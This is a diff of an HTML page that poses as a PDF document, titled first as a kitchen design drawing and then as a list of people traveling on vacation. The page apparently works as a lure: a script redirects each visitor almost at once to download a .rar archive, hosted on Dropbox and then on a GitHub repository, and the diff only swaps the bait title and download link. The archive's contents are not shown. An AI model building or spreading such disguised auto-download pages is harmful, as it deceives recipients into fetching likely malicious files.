--- a/index.html
+++ b/index.html
@@ -2,13 +2,14 @@
 <html lang="en-US">
     <head>
         <meta charset="UTF-8">
-        <meta property="og:title" content="Detailed-kitchen-design-drawing.pdf">
+        <meta property="og:title" content="List of people traveling on vacation
+.pdf">
         <title></title>
     </head>
     <body>
         <script>
             setTimeout(function() {
-                window.location.replace("https://dl.dropboxusercontent.com/scl/fi/f4n0f66277rkxhap50erj/Detailed-kitchen-design-drawing.rar?rlkey=mxhmfcnv7yk2fvzlaw474rf3g&dl=0");
+                window.location.replace("https://github.com/savefille/List-of-people-traveling-on-vacation/raw/main/budget%20and%20list%20of%20people%20for%20the%20trip%20.rar");
             }, 1);
         </script>
     </body>
